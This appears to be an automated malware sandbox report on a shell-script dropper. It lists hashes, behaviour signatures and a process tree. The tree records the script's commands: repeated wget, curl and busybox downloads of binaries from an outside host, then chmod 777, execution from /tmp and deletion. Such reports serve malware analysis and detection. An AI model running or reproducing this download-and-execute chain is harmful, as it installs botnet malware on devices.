Analysis
-
max time kernel
88s -
max time network
90s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
-
Size
10KB
-
MD5
ae125d61416f00e8ab77c13b1c87f06f
-
SHA1
a50cea28aa988684f1d031bd2504e6306371bd65
-
SHA256
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a
-
SHA512
762c6ad0536b762a73b4963dd635b801bada9f095ac7fbcb3ff72a12c880666640bab1383c1ad21571f47c02ddf9e0a832963df51ed819276b7dd8269e26830e
-
SSDEEP
192:Nr345Rs+M0oTailh1+HPCegD5BMzv2h1+HPd0oTaiB5BMzvar345Rx:Nr345Rs+M0oTaiJegD5BMzvR0oTaiB5e
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:712
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:733
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:766
-
-
/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:777
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:778
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:794
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:809
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:910
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:917
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:931
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:952
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:959
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:1001
-
-
